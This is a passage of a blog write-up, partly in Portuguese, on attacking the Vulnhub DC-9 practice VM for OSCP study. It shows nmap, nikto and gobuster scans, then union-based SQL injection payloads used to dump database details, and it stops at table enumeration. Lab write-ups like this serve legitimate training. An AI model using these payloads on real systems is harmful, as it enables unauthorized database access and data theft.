writeup-dc9.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text text-anchor=%22middle%22 dominant-baseline=%22middle%22 x=%2250%22 y=%2255%22 font-size=%2280%22>🐞</text></svg>">
<style>
:root {
font-size: 20px;
}
</style>
<title>Writeup - DC9 - OSCP Like VM | www.offensivethink.com</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Writeup - DC9 - OSCP Like VM">
<meta name="description" content="DC-9 is a Vulnhub VM for OSCP study.">
<meta property="og:description" content="DC-9 is a Vulnhub VM for OSCP study.">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="index.html">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text text-anchor=%22middle%22 dominant-baseline=%22middle%22 x=%2250%22 y=%2255%22 font-size=%2280%22>🐞</text></svg>"></span>
<span>Home</span>
</div>
</a>
<span class="Navbar__Delim">·</span>
<a href="referencia-rapida.html">
<div class="Navbar__Btn">
<span>→ Quick reference ← </span>
</div>
</a>
<span class="Navbar__Delim">·</span>
<a href="contacts.html">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F12e48681-f6a0-41cb-aa1f-73a46f35c5d3%2FOffensiveThink_Logo_Negative_notion_-_280x280.png?table=block&id=ca933149-5245-4511-a885-9cf5922808e1"></span>
<span>about & contacts</span>
</div>
</a>
<span class="Navbar__Delim">·</span>
<a href="offensivetools.html">
<div class="Navbar__Btn">
<span>Offensive Tools</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Cover">
<img src="https://www.notion.so/images/page-cover/nasa_great_sandy_desert_australia.jpg">
</div>
<div class="Header__Spacer ">
</div>
<h1 class="Header__Title">Writeup - DC9 - OSCP Like VM</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Thu, Jul 30, 2020</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--purple">
<a href="tag/lfi.html">lfi</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--green">
<a href="tag/fuzz.html">fuzz</a>
</span>
</div>
</header>
<article id="https://www.notion.so/2df49989efea4883a34bc5b0764da5af" class="PageRoot"><div id="https://www.notion.so/46284e20ebb9485c96630f0f47e97210" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">This writeup more or less summarizes all the attempts made until reaching the final result; there were many setbacks along the way that were left out so as not to make the writeup longer than it already is.</span></span></p></div>
<div id="https://www.notion.so/b2d3f61b308a4ea0808c312bd518e89c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div>
<div id="https://www.notion.so/48805a55386c4792a0e3b09da2155884" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">VM details</span></span></p></div>
<ul class="BulletedListWrapper"><li id="https://www.notion.so/74377935aafe437f8866d88b26d0feca" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">IP: 192.168.1.9, obtained via DHCP</span></span></li><li id="https://www.notion.so/7e2b3c58b9654af394a521af9e30a32d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">VM creator's page: </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://www.five86.com/">https://www.five86.com/</a></span></span></li><li id="https://www.notion.so/913f83368a574a04969ff8b62211315d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Download page on Vulnhub: </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://www.vulnhub.com/entry/dc-9,412/">https://www.vulnhub.com/entry/dc-9,412/</a></span></span></li></ul>
<div id="https://www.notion.so/1ca2ec5c3709421fbdf864224ebde552" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div>
<div id="https://www.notion.so/59503566140043f781654d2ad9618fe7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">I found it a very interesting challenge, not so trivial, and one designed, according to its creator, to be a machine that resembles a real-world case more than CTF-style machines with "gotchas", hints, etc.</span></span></p></div>
<h1 id="https://www.notion.so/17f7c56900af40769be84250bdbd9c62" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--1"><a class="Anchor" href="#https://www.notion.so/17f7c56900af40769be84250bdbd9c62"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">SCAN</span></span></h1>
<pre id="https://www.notion.so/c2ccde62abe0417bb1ae1b1538c60db9" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root@kali:/mnt/hgfs/trainnings/OSCPlike/Vulnhub-01-DC9# nmap 192.168.1.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-04 20:28 EDT
Nmap scan report for 192.168.1.9
Host is up (0.00098s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
</span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedBg SemanticString__Fragment--BgYellow"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><span>22/tcp filtered ssh
80/tcp open http</span></strong></mark></span><span class="SemanticString"><span>
MAC Address: 00:0C:29:0C:D9:D6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 7.19 seconds
root@kali:/mnt/hgfs/trainnings/OSCPlike/Vulnhub-01-DC9# nmap -sV -O -p80 192.168.1.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-04 20:28 EDT
Nmap scan report for 192.168.1.9
Host is up (0.0017s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
MAC Address: 00:0C:29:0C:D9:D6 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.33 seconds</span></span></span></code></pre>
<div id="https://www.notion.so/21961380c6d94802ae1e12741560f6ea" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We see one open port (80) and one filtered port (22); in other words, the port is probably open on the server, but access to it is restricted by the machine's firewall!</span></span></p></div>
<div id="https://www.notion.so/c4d5cd4665ab44f8b6805d383cc882c8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div>
<h1 id="https://www.notion.so/7a92d59575754c1394ab4e9b4faf0e8c" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--1"><a class="Anchor" href="#https://www.notion.so/7a92d59575754c1394ab4e9b4faf0e8c"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">ENUMERATION</span></span></h1>
<div id="https://www.notion.so/5f6ab2a0c8a84f3c860d5d4df45dd415" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Accessing the address in the browser</span></span></p></div>
<div id="https://www.notion.so/cd83e97fce8f41f79cc45161e849be0e" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F39aa2ccc-8547-49f7-9af2-9ba4d53a447b%2FUntitled.png?width=840&table=block&id=cd83e97f-ce8f-41f7-9cc4-5161e849be0e"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F39aa2ccc-8547-49f7-9af2-9ba4d53a447b%2FUntitled.png?width=840&table=block&id=cd83e97f-ce8f-41f7-9cc4-5161e849be0e" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div>
<div id="https://www.notion.so/05bf7b30d8334126a684e5f8cc2c72f7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div>
<div id="https://www.notion.so/007da85a2c124de6b294714c3bc6abb3" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We notice, right away, a mention of the domain example.com. We add an entry to /etc/hosts, since Apache may be running with Virtual Hosts and serve a different site when accessed by domain rather than by IP.</span></span></p></div>
<pre id="https://www.notion.so/18ecc06b21e24b7782504646b3a53ab1" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>echo "192.168.1.9 example.com" >> /etc/hosts</span></span></span></code></pre>
<div id="https://www.notion.so/e5550188b7734e57b6233a28974ba1fd" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We verify that the site stays the same whether accessed via the IP or via the domain. 
Virtual Host ruled out!</span></span></p></div>
<div id="https://www.notion.so/2ab53d6c7f0845d385d46ecd079e3935" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div>
<div id="https://www.notion.so/4f13c427b80f48aeafc3ddf99675775d" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F168ac6c0-67f5-485f-9670-897e3fc52dab%2FUntitled.png?width=641&table=block&id=4f13c427-b80f-48ae-afc3-ddf99675775d"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F168ac6c0-67f5-485f-9670-897e3fc52dab%2FUntitled.png?width=641&table=block&id=4f13c427-b80f-48ae-afc3-ddf99675775d" style="width:641px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div>
<div id="https://www.notion.so/d236a540edf04172ae9df92ebb6ddc27" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We'll use goBuster to enumerate some directories and nikto to check whether there is any associated vulnerability.</span></span></p></div>
<h3 id="https://www.notion.so/4d423db70d7e42e08296a5f1156d7299" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--3"><a class="Anchor" href="#https://www.notion.so/4d423db70d7e42e08296a5f1156d7299"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">nikto</span></span></h3>
<pre id="https://www.notion.so/a4051c0b914741e686df14d0b00fe93b" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root@kali:/mnt/hgfs/trainnings/OSCPlike/Vulnhub-01-DC9# nikto -host 192.168.1.9
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.9
+ Target Hostname: 192.168.1.9
+ Target Port: 80
+ Start Time: 2020-07-04 20:38:07 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7918 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2020-07-04 20:40:10 (GMT-4) (123 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested</span></span></span></code></pre>
<h3 id="https://www.notion.so/319b9fbd3321433e847ba19eaae9a881" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--3"><a class="Anchor" href="#https://www.notion.so/319b9fbd3321433e847ba19eaae9a881"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">goBuster</span></span></h3>
<pre id="https://www.notion.so/d05e0ff961864b1cb790fbfa0fd9b4f9" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root@kali:/mnt/hgfs/trainnings/OSCPlike/Vulnhub-01-DC9# gobuster dir -u http://192.168.1.9:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x "txt,html,php,asp,aspx,jsp"
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.9:80/
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: jsp,txt,html,php,asp,aspx
[+] Timeout: 10s
===============================================================
2020/07/05 19:53:12 Starting gobuster
===============================================================
/.hta (Status: 403) [Size: 276]
/.hta.jsp (Status: 403) [Size: 276]
/.hta.txt (Status: 403) [Size: 276]
/.hta.html (Status: 403) [Size: 276]
/.hta.php (Status: 403) [Size: 276]
/.hta.asp (Status: 403) [Size: 276]
/.hta.aspx (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.htpasswd.html (Status: 403) [Size: 276]
/.htpasswd.php (Status: 403) [Size: 276]
/.htpasswd.asp (Status: 403) [Size: 276]
/.htpasswd.aspx (Status: 403) [Size: 276]
/.htpasswd.jsp (Status: 403) [Size: 276]
/.htpasswd.txt (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/.htaccess.jsp (Status: 403) [Size: 276]
/.htaccess.txt (Status: 403) [Size: 276]
/.htaccess.html (Status: 403) [Size: 276]
/.htaccess.php (Status: 403) [Size: 276]
/.htaccess.asp (Status: 403) [Size: 276]
/.htaccess.aspx (Status: 403) [Size: 276]
/config.php (Status: 200) [Size: 0]
/css (Status: 301) [Size: 308]
/display.php (Status: 200) [Size: 2961]
/includes (Status: 301) [Size: 313]
/index.php (Status: 200) [Size: 917]
/index.php (Status: 200) [Size: 917]
/logout.php (Status: 302) [Size: 0]
/manage.php (Status: 200) [Size: 1210]
/results.php (Status: 200) [Size: 1056]
/search.php (Status: 200) [Size: 1091]
/server-status (Status: 403) [Size: 276]
/session.php (Status: 302) [Size: 0]
/welcome.php (Status: 302) [Size: 0]
===============================================================
2020/07/05 19:53:43 Finished
===============================================================</span></span></span></code></pre><div id="https://www.notion.so/170b31e1351d4c268db0ae3f12e715b0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Podemos observar acima que existem alguns diretórios e arquivos encontrados.</span></span></p></div><div id="https://www.notion.so/aab9feb865b9490888f49cbd96f750d5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Ao acessar o welcome.php observamos que ele faz um redirect para o manage.php, já disponibiliza outras opções no menu, como o Add Record e apresenta uma mensagem no rodapé de </span><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">File does not Exist. </strong></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Seria um LFI ? 
</strong></mark></span></span></p></div><div id="https://www.notion.so/3fb5e3451bd5433b983e81d1444931ce" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/6fef2175ffc7427e962e97d748aeaa84" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F68927bf7-b7c9-44a1-a9aa-cf36387910c3%2FUntitled.png?width=689&table=block&id=6fef2175-ffc7-427e-962e-97d748aeaa84"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F68927bf7-b7c9-44a1-a9aa-cf36387910c3%2FUntitled.png?width=689&table=block&id=6fef2175-ffc7-427e-962e-97d748aeaa84" style="width:689px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/860f7bcc38644881a16edcccd924db0d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Parece que ao acessar o welcome.php diretamente, sem um login prévio, fez o site autenticar como admin mas não completamente, pois a funcionalidade de Add Record, no menu, não funciona corretamente. </span></span></p></div><div id="https://www.notion.so/31318e4ea2f14dffaf3b6e05dd9b4d13" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">O site apresenta uma funcionalidade de search. Vamos tentar verificar se possui um SQLi. 
</span></span></p></div><div id="https://www.notion.so/bfaaeb72b9b14b22b900774ae38fde36" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/b41f0dd166b6407c9297f21bd49fa82e" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fb6935c89-3472-40fb-b932-991efc4d5b28%2FUntitled.png?width=386&table=block&id=b41f0dd1-66b6-407c-9297-f21bd49fa82e"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fb6935c89-3472-40fb-b932-991efc4d5b28%2FUntitled.png?width=386&table=block&id=b41f0dd1-66b6-407c-9297-f21bd49fa82e" style="width:386px"/></a><figcaption><span class="SemanticStringArray"><span class="SemanticString">ataque</span></span></figcaption></figure></div><div id="https://www.notion.so/4ec3ad02623b4940bf5a080550e09271" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fccd9fa0a-5374-4f93-a3c9-04f6c8f23b3c%2FUntitled.png?width=247&table=block&id=4ec3ad02-623b-4940-bf5a-080550e09271"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fccd9fa0a-5374-4f93-a3c9-04f6c8f23b3c%2FUntitled.png?width=247&table=block&id=4ec3ad02-623b-4940-bf5a-080550e09271" style="width:247px"/></a><figcaption><span class="SemanticStringArray"><span class="SemanticString">resultado</span></span></figcaption></figure></div><div id="https://www.notion.so/b6c01f16205548b88db6b4cbc8f9128b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/3087f99e33b54356a66bc3ec741e8dce" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span 
class="SemanticString">Aparentemente, pelo resultado, nos levaria a acreditar que a aplicação está tratando </span><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">erros</strong></span><span class="SemanticString"> de SQLi, já que o código acima deveria gerar um erro uma vez que geraria um SQL mais ou menos do tipo: </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">SELECT campo FROM tabela WHERE campo = '' 1=1 — - </code></span><span class="SemanticString">, o que daria erro por falta de um operador lógico no WHERE.</span></span></p></div><div id="https://www.notion.so/132bd08034134880b65237c96b809373" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Vamos tentar mais uma vez agora com um operador lógico : </span></span></p></div><div id="https://www.notion.so/c99cf06a6c0f4c3198f6e62e14ebd914" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/ebefaa0a3d0446cf8647f91f38c68ff6" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fc66a798b-bbf6-4b4d-804b-816646dee495%2FUntitled.png?width=402&table=block&id=ebefaa0a-3d04-46cf-8647-f91f38c68ff6"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fc66a798b-bbf6-4b4d-804b-816646dee495%2FUntitled.png?width=402&table=block&id=ebefaa0a-3d04-46cf-8647-f91f38c68ff6" style="width:402px"/></a><figcaption><span class="SemanticStringArray"><span class="SemanticString">ataque</span></span></figcaption></figure></div><div id="https://www.notion.so/59f07ae88785412db5c092e54f89bb3e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span 
class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/c98a273c63e24860bfe09fc6bc602950" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fac2bfdda-cee5-486d-bba4-63096b51904f%2FUntitled.png?width=394&table=block&id=c98a273c-63e2-4860-bfe0-9fc6bc602950"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fac2bfdda-cee5-486d-bba4-63096b51904f%2FUntitled.png?width=394&table=block&id=c98a273c-63e2-4860-bfe0-9fc6bc602950" style="width:394px"/></a><figcaption><span class="SemanticStringArray"><span class="SemanticString">resultado</span></span></figcaption></figure></div><div id="https://www.notion.so/5d417edcff29467583b1726d223d45a6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/b2141668170d4526ac6bd928522198e0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/fe58d05ddb6340c88e07d2a670e7c233" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Observarmos que a aplicação respondeu ao SQLi mostrando todos o conteúdo da tabela devido a condição </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">or 1=1 </code></span><span class="SemanticString">. Vamos então enumerar os bancos, tabelas, campos e conteúdos. 
Foram utilizados os seguintes comandos </span><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">inseridos no campo search</strong></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/6b6775b7bff24654bf352394d7b63d4c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><pre id="https://www.notion.so/465d347d6fb24931ad5053fcfeec876a" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token number">1</span> <span class="token operator">-</span> Quantidade de Colunas: Ordenar até não obter resultado<span class="token operator">!</span>
tom' <span class="token operator">or</span> <span class="token number">1</span><span class="token operator">=</span><span class="token number">1</span> <span class="token keyword">order</span> <span class="token keyword">by</span> <span class="token number">7</span> <span class="token comment">-- - <- Não retorna nenhum resultado, logo, são 6 colunas </span></span></span></span></code></pre><pre id="https://www.notion.so/ee48159dbb4943809e43994a2a0136ce" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token number">2</span> <span class="token operator">-</span> Verificar em que campos temos retorno visual
tom<span class="token string">' union select '</span>a<span class="token string">','</span>b<span class="token string">','</span>c<span class="token string">','</span>d<span class="token string">','</span>e<span class="token string">','</span>f' <span class="token comment">-- -</span></span></span></span></code></pre><div id="https://www.notion.so/9fa492c67c064b299c65a274e6d6f8f5" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F34e04ff7-b9f3-49be-a5dc-3324e562c88a%2FUntitled.png?width=420&table=block&id=9fa492c6-7c06-4b29-9c65-a274e6d6f8f5"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F34e04ff7-b9f3-49be-a5dc-3324e562c88a%2FUntitled.png?width=420&table=block&id=9fa492c6-7c06-4b29-9c65-a274e6d6f8f5" style="width:420px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><pre id="https://www.notion.so/b13a1ea58d8444d488448ce2348a4d29" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token number">3</span> <span class="token operator">-</span> Informações gerais <span class="token keyword">do</span> banco
tom' <span class="token keyword">union</span> <span class="token keyword">select</span> @<span class="token variable">@datadir</span><span class="token punctuation">,</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>@<span class="token variable">@version</span><span class="token punctuation">,</span><span class="token keyword">user</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token keyword">system_user</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>@<span class="token variable">@hostname</span> <span class="token comment">-- -</span>
ID: <span class="token operator">/</span>var<span class="token operator">/</span>lib<span class="token operator">/</span>mysql<span class="token operator">/</span>
Name: Staff <span class="token number">10.3</span><span class="token number">.17</span><span class="token operator">-</span>MariaDB<span class="token operator">-</span><span class="token number">0</span><span class="token operator">+</span>deb10u1
Position: dbuser<span class="token variable">@localhost</span>
Phone <span class="token keyword">No</span>: dbuser<span class="token variable">@localhost</span>
Email: dc<span class="token operator">-</span><span class="token number">9</span></span></span></span></code></pre><pre id="https://www.notion.so/7605a68b52d04f8a8c856ecfcdaf56b6" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token number">4</span> <span class="token operator">-</span> Listing all tables of all databases at once
